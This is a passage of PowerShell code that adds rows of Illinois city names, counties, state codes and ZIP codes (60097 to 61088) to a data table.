$Cities.Rows.Add("Wonder lake","McHenry","Illinois","IL","17","60097") + $null = $Cities.Rows.Add("Woodstock","McHenry","Illinois","IL","17","60098") + $null = $Cities.Rows.Add("Zion","Lake","Illinois","IL","17","60099") + $null = $Cities.Rows.Add("Zcta 600hh","Cook","Illinois","IL","17","600HH") + $null = $Cities.Rows.Add("Addison","DuPage","Illinois","IL","17","60101") + $null = $Cities.Rows.Add("Lake in the hill","McHenry","Illinois","IL","17","60102") + $null = $Cities.Rows.Add("Hanover park","DuPage","Illinois","IL","17","60103") + $null = $Cities.Rows.Add("Bellwood","Cook","Illinois","IL","17","60104") + $null = $Cities.Rows.Add("Bensenville","DuPage","Illinois","IL","17","60106") + $null = $Cities.Rows.Add("Streamwood","Cook","Illinois","IL","17","60107") + $null = $Cities.Rows.Add("Bloomingdale","DuPage","Illinois","IL","17","60108") + $null = $Cities.Rows.Add("Burlington","Kane","Illinois","IL","17","60109") + $null = $Cities.Rows.Add("Carpentersville","Kane","Illinois","IL","17","60110") + $null = $Cities.Rows.Add("Clare","DeKalb","Illinois","IL","17","60111") + $null = $Cities.Rows.Add("Cortland","DeKalb","Illinois","IL","17","60112") + $null = $Cities.Rows.Add("Creston","Ogle","Illinois","IL","17","60113") + $null = $Cities.Rows.Add("De kalb","DeKalb","Illinois","IL","17","60115") + $null = $Cities.Rows.Add("Dundee","Kane","Illinois","IL","17","60118") + $null = $Cities.Rows.Add("Elburn","Kane","Illinois","IL","17","60119") + $null = $Cities.Rows.Add("Elgin","Kane","Illinois","IL","17","60120") + $null = $Cities.Rows.Add("Elgin","Kane","Illinois","IL","17","60123") + $null = $Cities.Rows.Add("Elmhurst","DuPage","Illinois","IL","17","60126") + $null = $Cities.Rows.Add("Esmond","DeKalb","Illinois","IL","17","60129") + $null = $Cities.Rows.Add("Forest park","Cook","Illinois","IL","17","60130") + $null = $Cities.Rows.Add("Franklin park","Cook","Illinois","IL","17","60131") + $null = $Cities.Rows.Add("Geneva","Kane","Illinois","IL","17","60134") + $null = $Cities.Rows.Add("Genoa","DeKalb","Illinois","IL","17","60135") + $null = $Cities.Rows.Add("Gilberts","Kane","Illinois","IL","17","60136") + $null = $Cities.Rows.Add("Glen ellyn","DuPage","Illinois","IL","17","60137") + $null = $Cities.Rows.Add("Glendale heights","DuPage","Illinois","IL","17","60139") + $null = $Cities.Rows.Add("Hampshire","Kane","Illinois","IL","17","60140") + $null = $Cities.Rows.Add("Hines","Cook","Illinois","IL","17","60141") + $null = $Cities.Rows.Add("Huntley","McHenry","Illinois","IL","17","60142") + $null = $Cities.Rows.Add("Itasca","DuPage","Illinois","IL","17","60143") + $null = $Cities.Rows.Add("Kingston","DeKalb","Illinois","IL","17","60145") + $null = $Cities.Rows.Add("Kirkland","DeKalb","Illinois","IL","17","60146") + $null = $Cities.Rows.Add("Lombard","DuPage","Illinois","IL","17","60148") + $null = $Cities.Rows.Add("Malta","DeKalb","Illinois","IL","17","60150") + $null = $Cities.Rows.Add("Maple park","Kane","Illinois","IL","17","60151") + $null = $Cities.Rows.Add("Marengo","McHenry","Illinois","IL","17","60152") + $null = $Cities.Rows.Add("Broadview","Cook","Illinois","IL","17","60153") + $null = $Cities.Rows.Add("Westchester","Cook","Illinois","IL","17","60154") + $null = $Cities.Rows.Add("Mellon financial","Cook","Illinois","IL","17","60155") + $null = $Cities.Rows.Add("Medinah","DuPage","Illinois","IL","17","60157") + $null = $Cities.Rows.Add("Melrose park","Cook","Illinois","IL","17","60160") + $null = $Cities.Rows.Add("Hillside","Cook","Illinois","IL","17","60162") + $null = $Cities.Rows.Add("Hillside","Cook","Illinois","IL","17","60163") + $null = $Cities.Rows.Add("Northlake","Cook","Illinois","IL","17","60164") + $null = $Cities.Rows.Add("Stone park","Cook","Illinois","IL","17","60165") + $null = $Cities.Rows.Add("River grove","Cook","Illinois","IL","17","60171") + $null = $Cities.Rows.Add("Roselle","DuPage","Illinois","IL","17","60172") + $null = $Cities.Rows.Add("Schaumburg","Cook","Illinois","IL","17","60173") + $null = $Cities.Rows.Add("Saint charles","Kane","Illinois","IL","17","60174") + $null = $Cities.Rows.Add("Saint charles","Kane","Illinois","IL","17","60175") + $null = $Cities.Rows.Add("Schiller park","Cook","Illinois","IL","17","60176") + $null = $Cities.Rows.Add("South elgin","Kane","Illinois","IL","17","60177") + $null = $Cities.Rows.Add("Sycamore","DeKalb","Illinois","IL","17","60178") + $null = $Cities.Rows.Add("Union","McHenry","Illinois","IL","17","60180") + $null = $Cities.Rows.Add("Villa park","DuPage","Illinois","IL","17","60181") + $null = $Cities.Rows.Add("Wayne","DuPage","Illinois","IL","17","60184") + $null = $Cities.Rows.Add("West chicago","DuPage","Illinois","IL","17","60185") + $null = $Cities.Rows.Add("Wheaton","DuPage","Illinois","IL","17","60187") + $null = $Cities.Rows.Add("Carol stream","DuPage","Illinois","IL","17","60188") + $null = $Cities.Rows.Add("Winfield","DuPage","Illinois","IL","17","60190") + $null = $Cities.Rows.Add("Wood dale","DuPage","Illinois","IL","17","60191") + $null = $Cities.Rows.Add("Hoffman estates","Cook","Illinois","IL","17","60192") + $null = $Cities.Rows.Add("Schaumburg","Cook","Illinois","IL","17","60193") + $null = $Cities.Rows.Add("Hoffman estates","Cook","Illinois","IL","17","60194") + $null = $Cities.Rows.Add("Hoffman estates","Cook","Illinois","IL","17","60195") + $null = $Cities.Rows.Add("Zcta 601hh","Kane","Illinois","IL","17","601HH") + $null = $Cities.Rows.Add("Evanston","Cook","Illinois","IL","17","60201") + $null = $Cities.Rows.Add("Evanston","Cook","Illinois","IL","17","60202") + $null = $Cities.Rows.Add("Evanston","Cook","Illinois","IL","17","60203") + $null = $Cities.Rows.Add("Oak park","Cook","Illinois","IL","17","60301") + $null = $Cities.Rows.Add("Oak park","Cook","Illinois","IL","17","60302") + $null = $Cities.Rows.Add("Oak park","Cook","Illinois","IL","17","60304") + $null = $Cities.Rows.Add("River forest","Cook","Illinois","IL","17","60305") + $null = $Cities.Rows.Add("Beecher","Will","Illinois","IL","17","60401") + $null = $Cities.Rows.Add("Stickney","Cook","Illinois","IL","17","60402") + $null = $Cities.Rows.Add("Blue island","Cook","Illinois","IL","17","60406") + $null = $Cities.Rows.Add("Braceville","Grundy","Illinois","IL","17","60407") + $null = $Cities.Rows.Add("Braidwood","Will","Illinois","IL","17","60408") + $null = $Cities.Rows.Add("Calumet city","Cook","Illinois","IL","17","60409") + $null = $Cities.Rows.Add("Channahon","Will","Illinois","IL","17","60410") + $null = $Cities.Rows.Add("Sauk village","Cook","Illinois","IL","17","60411") + $null = $Cities.Rows.Add("Chicago ridge","Cook","Illinois","IL","17","60415") + $null = $Cities.Rows.Add("Coal city","Grundy","Illinois","IL","17","60416") + $null = $Cities.Rows.Add("Crete","Will","Illinois","IL","17","60417") + $null = $Cities.Rows.Add("Dolton","Cook","Illinois","IL","17","60419") + $null = $Cities.Rows.Add("Dwight","Livingston","Illinois","IL","17","60420") + $null = $Cities.Rows.Add("Elwood","Will","Illinois","IL","17","60421") + $null = $Cities.Rows.Add("Flossmoor","Cook","Illinois","IL","17","60422") + $null = $Cities.Rows.Add("Frankfort","Will","Illinois","IL","17","60423") + $null = $Cities.Rows.Add("Gardner","Grundy","Illinois","IL","17","60424") + $null = $Cities.Rows.Add("Glenwood","Cook","Illinois","IL","17","60425") + $null = $Cities.Rows.Add("Markham","Cook","Illinois","IL","17","60426") + $null = $Cities.Rows.Add("Hazel crest","Cook","Illinois","IL","17","60429") + $null = $Cities.Rows.Add("Homewood","Cook","Illinois","IL","17","60430") + $null = $Cities.Rows.Add("Joliet","Will","Illinois","IL","17","60431") + $null = $Cities.Rows.Add("Joliet","Will","Illinois","IL","17","60432") + $null = $Cities.Rows.Add("Joliet","Will","Illinois","IL","17","60433") + $null = $Cities.Rows.Add("Shorewood","Will","Illinois","IL","17","60435") + $null = $Cities.Rows.Add("Rockdale","Will","Illinois","IL","17","60436") + $null = $Cities.Rows.Add("Kinsman","Grundy","Illinois","IL","17","60437") + $null = $Cities.Rows.Add("Lansing","Cook","Illinois","IL","17","60438") + $null = $Cities.Rows.Add("Argonne","Cook","Illinois","IL","17","60439") + $null = $Cities.Rows.Add("Bolingbrook","Will","Illinois","IL","17","60440") + $null = $Cities.Rows.Add("Romeoville","Will","Illinois","IL","17","60441") + $null = $Cities.Rows.Add("Manhattan","Will","Illinois","IL","17","60442") + $null = $Cities.Rows.Add("Matteson","Cook","Illinois","IL","17","60443") + $null = $Cities.Rows.Add("Mazon","Grundy","Illinois","IL","17","60444") + $null = $Cities.Rows.Add("Crestwood","Cook","Illinois","IL","17","60445") + $null = $Cities.Rows.Add("Romeoville","Will","Illinois","IL","17","60446") + $null = $Cities.Rows.Add("Minooka","Grundy","Illinois","IL","17","60447") + $null = $Cities.Rows.Add("Mokena","Will","Illinois","IL","17","60448") + $null = $Cities.Rows.Add("Monee","Will","Illinois","IL","17","60449") + $null = $Cities.Rows.Add("Morris","Grundy","Illinois","IL","17","60450") + $null = $Cities.Rows.Add("New lenox","Will","Illinois","IL","17","60451") + $null = $Cities.Rows.Add("Oak forest","Cook","Illinois","IL","17","60452") + $null = $Cities.Rows.Add("Oak lawn","Cook","Illinois","IL","17","60453") + $null = $Cities.Rows.Add("Bridgeview","Cook","Illinois","IL","17","60455") + $null = $Cities.Rows.Add("Hometown","Cook","Illinois","IL","17","60456") + $null = $Cities.Rows.Add("Hickory hills","Cook","Illinois","IL","17","60457") + $null = $Cities.Rows.Add("Justice","Cook","Illinois","IL","17","60458") + $null = $Cities.Rows.Add("Burbank","Cook","Illinois","IL","17","60459") + $null = $Cities.Rows.Add("Odell","Livingston","Illinois","IL","17","60460") + $null = $Cities.Rows.Add("Olympia fields","Cook","Illinois","IL","17","60461") + $null = $Cities.Rows.Add("Orland park","Cook","Illinois","IL","17","60462") + $null = $Cities.Rows.Add("Palos heights","Cook","Illinois","IL","17","60463") + $null = $Cities.Rows.Add("Palos park","Cook","Illinois","IL","17","60464") + $null = $Cities.Rows.Add("Palos hills","Cook","Illinois","IL","17","60465") + $null = $Cities.Rows.Add("University park","Cook","Illinois","IL","17","60466") + $null = $Cities.Rows.Add("Zcta 60467","Cook","Illinois","IL","17","60467") + $null = $Cities.Rows.Add("Peotone","Will","Illinois","IL","17","60468") + $null = $Cities.Rows.Add("Posen","Cook","Illinois","IL","17","60469") + $null = $Cities.Rows.Add("Ransom","La Salle","Illinois","IL","17","60470") + $null = $Cities.Rows.Add("Richton park","Cook","Illinois","IL","17","60471") + $null = $Cities.Rows.Add("Robbins","Cook","Illinois","IL","17","60472") + $null = $Cities.Rows.Add("South holland","Cook","Illinois","IL","17","60473") + $null = $Cities.Rows.Add("South wilmington","Grundy","Illinois","IL","17","60474") + $null = $Cities.Rows.Add("Steger","Will","Illinois","IL","17","60475") + $null = $Cities.Rows.Add("Thornton","Cook","Illinois","IL","17","60476") + $null = $Cities.Rows.Add("Tinley park","Cook","Illinois","IL","17","60477") + $null = $Cities.Rows.Add("Country club hil","Cook","Illinois","IL","17","60478") + $null = $Cities.Rows.Add("Verona","Grundy","Illinois","IL","17","60479") + $null = $Cities.Rows.Add("Willow springs","Cook","Illinois","IL","17","60480") + $null = $Cities.Rows.Add("Custer park","Will","Illinois","IL","17","60481") + $null = $Cities.Rows.Add("Worth","Cook","Illinois","IL","17","60482") + $null = $Cities.Rows.Add("Zcta 60490","Will","Illinois","IL","17","60490") + $null = $Cities.Rows.Add("Zcta 604hh","Cook","Illinois","IL","17","604HH") + $null = $Cities.Rows.Add("Argo","Cook","Illinois","IL","17","60501") + $null = $Cities.Rows.Add("Aurora","DuPage","Illinois","IL","17","60504") + $null = $Cities.Rows.Add("Aurora","Kane","Illinois","IL","17","60505") + $null = $Cities.Rows.Add("Aurora","Kane","Illinois","IL","17","60506") + $null = $Cities.Rows.Add("Batavia","Kane","Illinois","IL","17","60510") + $null = $Cities.Rows.Add("Big rock","Kane","Illinois","IL","17","60511") + $null = $Cities.Rows.Add("Bristol","Kendall","Illinois","IL","17","60512") + $null = $Cities.Rows.Add("Brookfield","Cook","Illinois","IL","17","60513") + $null = $Cities.Rows.Add("Clarendon hills","DuPage","Illinois","IL","17","60514") + $null = $Cities.Rows.Add("Downers grove","DuPage","Illinois","IL","17","60515") + $null = $Cities.Rows.Add("Downers grove","DuPage","Illinois","IL","17","60516") + $null = $Cities.Rows.Add("Woodridge","DuPage","Illinois","IL","17","60517") + $null = $Cities.Rows.Add("Earlville","La Salle","Illinois","IL","17","60518") + $null = $Cities.Rows.Add("Eola","DuPage","Illinois","IL","17","60519") + $null = $Cities.Rows.Add("Hinckley","DeKalb","Illinois","IL","17","60520") + $null = $Cities.Rows.Add("Oak brook","DuPage","Illinois","IL","17","60521") + $null = $Cities.Rows.Add("Zcta 60523","DuPage","Illinois","IL","17","60523") + $null = $Cities.Rows.Add("Hodgkins","Cook","Illinois","IL","17","60525") + $null = $Cities.Rows.Add("World of beauty","Cook","Illinois","IL","17","60526") + $null = $Cities.Rows.Add("Lee","Lee","Illinois","IL","17","60530") + $null = $Cities.Rows.Add("Leland","La Salle","Illinois","IL","17","60531") + $null = $Cities.Rows.Add("Lisle","DuPage","Illinois","IL","17","60532") + $null = $Cities.Rows.Add("Lyons","Cook","Illinois","IL","17","60534") + $null = $Cities.Rows.Add("Millbrook","Kendall","Illinois","IL","17","60536") + $null = $Cities.Rows.Add("Millington","Kendall","Illinois","IL","17","60537") + $null = $Cities.Rows.Add("Montgomery","Kendall","Illinois","IL","17","60538") + $null = $Cities.Rows.Add("Mooseheart","Kane","Illinois","IL","17","60539") + $null = $Cities.Rows.Add("Naperville","DuPage","Illinois","IL","17","60540") + $null = $Cities.Rows.Add("Newark","Kendall","Illinois","IL","17","60541") + $null = $Cities.Rows.Add("North aurora","Kane","Illinois","IL","17","60542") + $null = $Cities.Rows.Add("Oswego","Kendall","Illinois","IL","17","60543") + $null = $Cities.Rows.Add("Plainfield","Will","Illinois","IL","17","60544") + $null = $Cities.Rows.Add("Plano","Kendall","Illinois","IL","17","60545") + $null = $Cities.Rows.Add("North riverside","Cook","Illinois","IL","17","60546") + $null = $Cities.Rows.Add("Sandwich","DeKalb","Illinois","IL","17","60548") + $null = $Cities.Rows.Add("Serena","La Salle","Illinois","IL","17","60549") + $null = $Cities.Rows.Add("Shabbona","DeKalb","Illinois","IL","17","60550") + $null = $Cities.Rows.Add("Sheridan","La Salle","Illinois","IL","17","60551") + $null = $Cities.Rows.Add("Somonauk","La Salle","Illinois","IL","17","60552") + $null = $Cities.Rows.Add("Steward","Lee","Illinois","IL","17","60553") + $null = $Cities.Rows.Add("Sugar grove","Kane","Illinois","IL","17","60554") + $null = $Cities.Rows.Add("Warrenville","DuPage","Illinois","IL","17","60555") + $null = $Cities.Rows.Add("Waterman","DeKalb","Illinois","IL","17","60556") + $null = $Cities.Rows.Add("Wedron","La Salle","Illinois","IL","17","60557") + $null = $Cities.Rows.Add("Western springs","Cook","Illinois","IL","17","60558") + $null = $Cities.Rows.Add("Westmont","DuPage","Illinois","IL","17","60559") + $null = $Cities.Rows.Add("Yorkville","Kendall","Illinois","IL","17","60560") + $null = $Cities.Rows.Add("Darien","DuPage","Illinois","IL","17","60561") + $null = $Cities.Rows.Add("Naperville","DuPage","Illinois","IL","17","60563") + $null = $Cities.Rows.Add("Naperville","Will","Illinois","IL","17","60564") + $null = $Cities.Rows.Add("Naperville","DuPage","Illinois","IL","17","60565") + $null = $Cities.Rows.Add("Zcta 605hh","Cook","Illinois","IL","17","605HH") + $null = $Cities.Rows.Add("Chicago","Cook","Illinois","IL","17","60601") + $null = $Cities.Rows.Add("Chicago","Cook","Illinois","IL","17","60602") + $null = $Cities.Rows.Add("Chicago","Cook","Illinois","IL","17","60603") + $null = $Cities.Rows.Add("Chicago","Cook","Illinois","IL","17","60604") + $null = $Cities.Rows.Add("Chicago","Cook","Illinois","IL","17","60605") + $null = $Cities.Rows.Add("Chicago","Cook","Illinois","IL","17","60606") + $null = $Cities.Rows.Add("Chicago","Cook","Illinois","IL","17","60607") + $null = $Cities.Rows.Add("Chicago","Cook","Illinois","IL","17","60608") + $null = $Cities.Rows.Add("Chicago","Cook","Illinois","IL","17","60609") + $null = $Cities.Rows.Add("Chicago","Cook","Illinois","IL","17","60610") + $null = $Cities.Rows.Add("Chicago","Cook","Illinois","IL","17","60611") + $null = $Cities.Rows.Add("Chicago","Cook","Illinois","IL","17","60612") + $null = $Cities.Rows.Add("Chicago","Cook","Illinois","IL","17","60613") + $null = $Cities.Rows.Add("Chicago","Cook","Illinois","IL","17","60614") + $null = $Cities.Rows.Add("Chicago","Cook","Illinois","IL","17","60615") + $null = $Cities.Rows.Add("Chicago","Cook","Illinois","IL","17","60616") + $null = $Cities.Rows.Add("Chicago","Cook","Illinois","IL","17","60617") + $null = $Cities.Rows.Add("Chicago","Cook","Illinois","IL","17","60618") + $null = $Cities.Rows.Add("Chicago","Cook","Illinois","IL","17","60619") + $null = $Cities.Rows.Add("Chicago","Cook","Illinois","IL","17","60620") + $null = $Cities.Rows.Add("Chicago","Cook","Illinois","IL","17","60621") + $null = $Cities.Rows.Add("Chicago","Cook","Illinois","IL","17","60622") + $null = $Cities.Rows.Add("Chicago","Cook","Illinois","IL","17","60623") + $null = $Cities.Rows.Add("Chicago","Cook","Illinois","IL","17","60624") + $null = $Cities.Rows.Add("Chicago","Cook","Illinois","IL","17","60625") + $null = $Cities.Rows.Add("Chicago","Cook","Illinois","IL","17","60626") + $null = $Cities.Rows.Add("Chicago","Cook","Illinois","IL","17","60628") + $null = $Cities.Rows.Add("Chicago","Cook","Illinois","IL","17","60629") + $null = $Cities.Rows.Add("Chicago","Cook","Illinois","IL","17","60630") + $null = $Cities.Rows.Add("Chicago","Cook","Illinois","IL","17","60631") + $null = $Cities.Rows.Add("Chicago","Cook","Illinois","IL","17","60632") + $null = $Cities.Rows.Add("Burnham","Cook","Illinois","IL","17","60633") + $null = $Cities.Rows.Add("Norridge","Cook","Illinois","IL","17","60634") + $null = $Cities.Rows.Add("Chicago","Cook","Illinois","IL","17","60636") + $null = $Cities.Rows.Add("Chicago","Cook","Illinois","IL","17","60637") + $null = $Cities.Rows.Add("Bedford park","Cook","Illinois","IL","17","60638") + $null = $Cities.Rows.Add("Chicago","Cook","Illinois","IL","17","60639") + $null = $Cities.Rows.Add("Chicago","Cook","Illinois","IL","17","60640") + $null = $Cities.Rows.Add("Chicago","Cook","Illinois","IL","17","60641") + $null = $Cities.Rows.Add("Calumet park","Cook","Illinois","IL","17","60643") + $null = $Cities.Rows.Add("Chicago","Cook","Illinois","IL","17","60644") + $null = $Cities.Rows.Add("Lincolnwood","Cook","Illinois","IL","17","60645") + $null = $Cities.Rows.Add("Lincolnwood","Cook","Illinois","IL","17","60646") + $null = $Cities.Rows.Add("Chicago","Cook","Illinois","IL","17","60647") + $null = $Cities.Rows.Add("Chicago","Cook","Illinois","IL","17","60649") + $null = $Cities.Rows.Add("Chicago","Cook","Illinois","IL","17","60651") + $null = $Cities.Rows.Add("Chicago","Cook","Illinois","IL","17","60652") + $null = $Cities.Rows.Add("Chicago","Cook","Illinois","IL","17","60653") + $null = $Cities.Rows.Add("Chicago","Cook","Illinois","IL","17","60654") + $null = $Cities.Rows.Add("Merrionette park","Cook","Illinois","IL","17","60655") + $null = $Cities.Rows.Add("Harwood heights","Cook","Illinois","IL","17","60656") + $null = $Cities.Rows.Add("Chicago","Cook","Illinois","IL","17","60657") + $null = $Cities.Rows.Add("Lincolnwood","Cook","Illinois","IL","17","60659") + $null = $Cities.Rows.Add("Chicago","Cook","Illinois","IL","17","60660") + $null = $Cities.Rows.Add("Chicago","Cook","Illinois","IL","17","60661") + $null = $Cities.Rows.Add("Zcta 606hh","Cook","Illinois","IL","17","606HH") + $null = $Cities.Rows.Add("Zcta 60706","Cook","Illinois","IL","17","60706") + $null = $Cities.Rows.Add("Zcta 60707","Cook","Illinois","IL","17","60707") + $null = $Cities.Rows.Add("Zcta 60712","Cook","Illinois","IL","17","60712") + $null = $Cities.Rows.Add("Niles","Cook","Illinois","IL","17","60714") + $null = $Cities.Rows.Add("Zcta 60803","Cook","Illinois","IL","17","60803") + $null = $Cities.Rows.Add("Zcta 60804","Cook","Illinois","IL","17","60804") + $null = $Cities.Rows.Add("Zcta 60805","Cook","Illinois","IL","17","60805") + $null = $Cities.Rows.Add("Zcta 60827","Cook","Illinois","IL","17","60827") + $null = $Cities.Rows.Add("Zcta 608hh","Cook","Illinois","IL","17","608HH") + $null = $Cities.Rows.Add("Kankakee","Kankakee","Illinois","IL","17","60901") + $null = $Cities.Rows.Add("Aroma park","Kankakee","Illinois","IL","17","60910") + $null = $Cities.Rows.Add("Ashkum","Iroquois","Illinois","IL","17","60911") + $null = $Cities.Rows.Add("Beaverville","Iroquois","Illinois","IL","17","60912") + $null = $Cities.Rows.Add("Bonfield","Kankakee","Illinois","IL","17","60913") + $null = $Cities.Rows.Add("Bourbonnais","Kankakee","Illinois","IL","17","60914") + $null = $Cities.Rows.Add("Bradley","Kankakee","Illinois","IL","17","60915") + $null = $Cities.Rows.Add("Buckingham","Kankakee","Illinois","IL","17","60917") + $null = $Cities.Rows.Add("Buckley","Iroquois","Illinois","IL","17","60918") + $null = $Cities.Rows.Add("Cabery","Ford","Illinois","IL","17","60919") + $null = $Cities.Rows.Add("Campus","Livingston","Illinois","IL","17","60920") + $null = $Cities.Rows.Add("Chatsworth","Livingston","Illinois","IL","17","60921") + $null = $Cities.Rows.Add("Chebanse","Kankakee","Illinois","IL","17","60922") + $null = $Cities.Rows.Add("Cissna park","Iroquois","Illinois","IL","17","60924") + $null = $Cities.Rows.Add("Claytonville","Iroquois","Illinois","IL","17","60926") + $null = $Cities.Rows.Add("Clifton","Iroquois","Illinois","IL","17","60927") + $null = $Cities.Rows.Add("Crescent city","Iroquois","Illinois","IL","17","60928") + $null = $Cities.Rows.Add("Cullom","Livingston","Illinois","IL","17","60929") + $null = $Cities.Rows.Add("Danforth","Iroquois","Illinois","IL","17","60930") + $null = $Cities.Rows.Add("Donovan","Iroquois","Illinois","IL","17","60931") + $null = $Cities.Rows.Add("East lynn","Vermilion","Illinois","IL","17","60932") + $null = $Cities.Rows.Add("Elliott","Ford","Illinois","IL","17","60933") + $null = $Cities.Rows.Add("Emington","Livingston","Illinois","IL","17","60934") + $null = $Cities.Rows.Add("Essex","Kankakee","Illinois","IL","17","60935") + $null = $Cities.Rows.Add("Gibson city","Ford","Illinois","IL","17","60936") + $null = $Cities.Rows.Add("Gilman","Iroquois","Illinois","IL","17","60938") + $null = $Cities.Rows.Add("Grant park","Kankakee","Illinois","IL","17","60940") + $null = $Cities.Rows.Add("Herscher","Kankakee","Illinois","IL","17","60941") + $null = $Cities.Rows.Add("Hoopeston","Vermilion","Illinois","IL","17","60942") + $null = $Cities.Rows.Add("Iroquois","Iroquois","Illinois","IL","17","60945") + $null = $Cities.Rows.Add("Kempton","Ford","Illinois","IL","17","60946") + $null = $Cities.Rows.Add("Loda","Iroquois","Illinois","IL","17","60948") + $null = $Cities.Rows.Add("Ludlow","Champaign","Illinois","IL","17","60949") + $null = $Cities.Rows.Add("Manteno","Kankakee","Illinois","IL","17","60950") + $null = $Cities.Rows.Add("Martinton","Iroquois","Illinois","IL","17","60951") + $null = $Cities.Rows.Add("Melvin","Ford","Illinois","IL","17","60952") + $null = $Cities.Rows.Add("Milford","Iroquois","Illinois","IL","17","60953") + $null = $Cities.Rows.Add("Momence","Kankakee","Illinois","IL","17","60954") + $null = $Cities.Rows.Add("Onarga","Iroquois","Illinois","IL","17","60955") + $null = $Cities.Rows.Add("Paxton","Ford","Illinois","IL","17","60957") + $null = $Cities.Rows.Add("Piper city","Ford","Illinois","IL","17","60959") + $null = $Cities.Rows.Add("Rankin","Vermilion","Illinois","IL","17","60960") + $null = $Cities.Rows.Add("Reddick","Kankakee","Illinois","IL","17","60961") + $null = $Cities.Rows.Add("Roberts","Ford","Illinois","IL","17","60962") + $null = $Cities.Rows.Add("Rossville","Vermilion","Illinois","IL","17","60963") + $null = $Cities.Rows.Add("Saint anne","Kankakee","Illinois","IL","17","60964") + $null = $Cities.Rows.Add("Sheldon","Iroquois","Illinois","IL","17","60966") + $null = $Cities.Rows.Add("Stockland","Iroquois","Illinois","IL","17","60967") + $null = $Cities.Rows.Add("Thawville","Iroquois","Illinois","IL","17","60968") + $null = $Cities.Rows.Add("Union hill","Kankakee","Illinois","IL","17","60969") + $null = $Cities.Rows.Add("Watseka","Iroquois","Illinois","IL","17","60970") + $null = $Cities.Rows.Add("Wellington","Iroquois","Illinois","IL","17","60973") + $null = $Cities.Rows.Add("Woodland","Iroquois","Illinois","IL","17","60974") + $null = $Cities.Rows.Add("Zcta 609hh","Iroquois","Illinois","IL","17","609HH") + $null = $Cities.Rows.Add("Apple river","Jo Daviess","Illinois","IL","17","61001") + $null = $Cities.Rows.Add("Ashton","Lee","Illinois","IL","17","61006") + $null = $Cities.Rows.Add("Baileyville","Ogle","Illinois","IL","17","61007") + $null = $Cities.Rows.Add("Belvidere","Boone","Illinois","IL","17","61008") + $null = $Cities.Rows.Add("Byron","Ogle","Illinois","IL","17","61010") + $null = $Cities.Rows.Add("Caledonia","Boone","Illinois","IL","17","61011") + $null = $Cities.Rows.Add("Capron","Boone","Illinois","IL","17","61012") + $null = $Cities.Rows.Add("Cedarville","Stephenson","Illinois","IL","17","61013") + $null = $Cities.Rows.Add("Chadwick","Carroll","Illinois","IL","17","61014") + $null = $Cities.Rows.Add("Chana","Ogle","Illinois","IL","17","61015") + $null = $Cities.Rows.Add("Cherry valley","Winnebago","Illinois","IL","17","61016") + $null = $Cities.Rows.Add("Dakota","Stephenson","Illinois","IL","17","61018") + $null = $Cities.Rows.Add("Davis","Stephenson","Illinois","IL","17","61019") + $null = $Cities.Rows.Add("Davis junction","Ogle","Illinois","IL","17","61020") + $null = $Cities.Rows.Add("Dixon","Lee","Illinois","IL","17","61021") + $null = $Cities.Rows.Add("Durand","Winnebago","Illinois","IL","17","61024") + $null = $Cities.Rows.Add("East dubuque","Jo Daviess","Illinois","IL","17","61025") + $null = $Cities.Rows.Add("Elizabeth","Jo Daviess","Illinois","IL","17","61028") + $null = $Cities.Rows.Add("Forreston","Ogle","Illinois","IL","17","61030") + $null = $Cities.Rows.Add("Franklin grove","Lee","Illinois","IL","17","61031") + $null = $Cities.Rows.Add("Freeport","Stephenson","Illinois","IL","17","61032") + $null = $Cities.Rows.Add("Galena","Jo Daviess","Illinois","IL","17","61036") + $null = $Cities.Rows.Add("Galt","Whiteside","Illinois","IL","17","61037") + $null = $Cities.Rows.Add("Garden prairie","Boone","Illinois","IL","17","61038") + $null = $Cities.Rows.Add("German valley","Stephenson","Illinois","IL","17","61039") + $null = $Cities.Rows.Add("Hanover","Jo Daviess","Illinois","IL","17","61041") + $null = $Cities.Rows.Add("Harmon","Lee","Illinois","IL","17","61042") + $null = $Cities.Rows.Add("Kent","Stephenson","Illinois","IL","17","61044") + $null = $Cities.Rows.Add("Lanark","Carroll","Illinois","IL","17","61046") + $null = $Cities.Rows.Add("Egan","Ogle","Illinois","IL","17","61047") + $null = $Cities.Rows.Add("Lena","Stephenson","Illinois","IL","17","61048") + $null = $Cities.Rows.Add("Lindenwood","Ogle","Illinois","IL","17","61049") + $null = $Cities.Rows.Add("Mc connell","Stephenson","Illinois","IL","17","61050") + $null = $Cities.Rows.Add("Milledgeville","Carroll","Illinois","IL","17","61051") + $null = $Cities.Rows.Add("Monroe center","Ogle","Illinois","IL","17","61052") + $null = $Cities.Rows.Add("Mount carroll","Carroll","Illinois","IL","17","61053") + $null = $Cities.Rows.Add("Mount morris","Ogle","Illinois","IL","17","61054") + $null = $Cities.Rows.Add("Nachusa","Lee","Illinois","IL","17","61057") + $null = $Cities.Rows.Add("Nora","Jo Daviess","Illinois","IL","17","61059") + $null = $Cities.Rows.Add("Orangeville","Stephenson","Illinois","IL","17","61060") + $null = $Cities.Rows.Add("Oregon","Ogle","Illinois","IL","17","61061") + $null = $Cities.Rows.Add("Pearl city","Stephenson","Illinois","IL","17","61062") + $null = $Cities.Rows.Add("Pecatonica","Winnebago","Illinois","IL","17","61063") + $null = $Cities.Rows.Add("Polo","Ogle","Illinois","IL","17","61064") + $null = $Cities.Rows.Add("Poplar grove","Boone","Illinois","IL","17","61065") + $null = $Cities.Rows.Add("Ridott","Stephenson","Illinois","IL","17","61067") + $null = $Cities.Rows.Add("Rochelle","Ogle","Illinois","IL","17","61068") + $null = $Cities.Rows.Add("Rock city","Stephenson","Illinois","IL","17","61070") + $null = $Cities.Rows.Add("Rock falls","Whiteside","Illinois","IL","17","61071") + $null = $Cities.Rows.Add("Rockton","Winnebago","Illinois","IL","17","61072") + $null = $Cities.Rows.Add("Roscoe","Winnebago","Illinois","IL","17","61073") + $null = $Cities.Rows.Add("Savanna","Carroll","Illinois","IL","17","61074") + $null = $Cities.Rows.Add("Scales mound","Jo Daviess","Illinois","IL","17","61075") + $null = $Cities.Rows.Add("Seward","Winnebago","Illinois","IL","17","61077") + $null = $Cities.Rows.Add("Shannon","Carroll","Illinois","IL","17","61078") + $null = $Cities.Rows.Add("South beloit","Winnebago","Illinois","IL","17","61080") + $null = $Cities.Rows.Add("Sterling","Whiteside","Illinois","IL","17","61081") + $null = $Cities.Rows.Add("Stillman valley","Ogle","Illinois","IL","17","61084") + $null = $Cities.Rows.Add("Stockton","Jo Daviess","Illinois","IL","17","61085") + $null = $Cities.Rows.Add("Warren","Jo Daviess","Illinois","IL","17","61087") + $null = $Cities.Rows.Add("Winnebago","Winnebago","Illinois","IL","17","61088") + $null = 